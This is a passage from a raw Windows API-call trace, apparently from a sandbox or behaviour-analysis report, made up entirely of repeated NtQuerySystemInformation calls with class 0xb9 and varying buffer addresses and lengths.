(SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x28, ResultLength=0x0) [0287.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c890, Length=0x20, ResultLength=0x0) [0287.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0287.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c810, Length=0x20, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x38, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c950, Length=0x20, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0287.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8e0, Length=0x20, ResultLength=0x0) [0287.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d270, Length=0x28, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x20, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x20, ResultLength=0x0) [0287.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x28, ResultLength=0x0) [0287.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfe0, Length=0x20, ResultLength=0x0) [0287.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfe0, Length=0x20, ResultLength=0x0) [0287.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x20, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x20, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d060, Length=0x20, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x48, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x48, ResultLength=0x0) [0287.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0287.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0287.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0287.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0287.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0287.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0287.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0287.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0287.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0287.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0287.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0287.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0287.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0287.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0287.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0287.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.188] NtQuerySystemInformation (SystemInformationClass=0xb9, 